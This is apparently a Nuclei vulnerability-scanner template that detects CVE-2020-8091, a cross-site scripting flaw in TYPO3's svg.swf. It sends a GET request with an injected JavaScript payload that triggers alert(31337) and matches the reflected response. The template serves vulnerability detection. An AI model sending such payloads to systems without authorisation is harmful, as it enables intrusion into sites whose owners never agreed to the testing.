id: CVE-2020-8091

info:
  name: TYPO3 Cross-Site Scripting Vulnerability
  author: dwisiswant0
  severity: medium
  description: svg.swf in TYPO3 6.2.0 to 6.2.38 ELTS and 7.0.0 to 7.1.0 could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack on a targeted system. This may be at a contrib/websvg/svg.swf pathname.
  tags: cve,cve2020,xss
  reference:
    - https://typo3.org/security/advisory/typo3-psa-2019-003/
    - https://www.purplemet.com/blog/typo3-xss-vulnerability

requests:
  - method: GET
    path:
      - "{{BaseURL}}/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(31337),this.x=1}//"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "31337"
        part: body
      - type: word
        words:
          - "application/x-shockwave-flash"
        part: header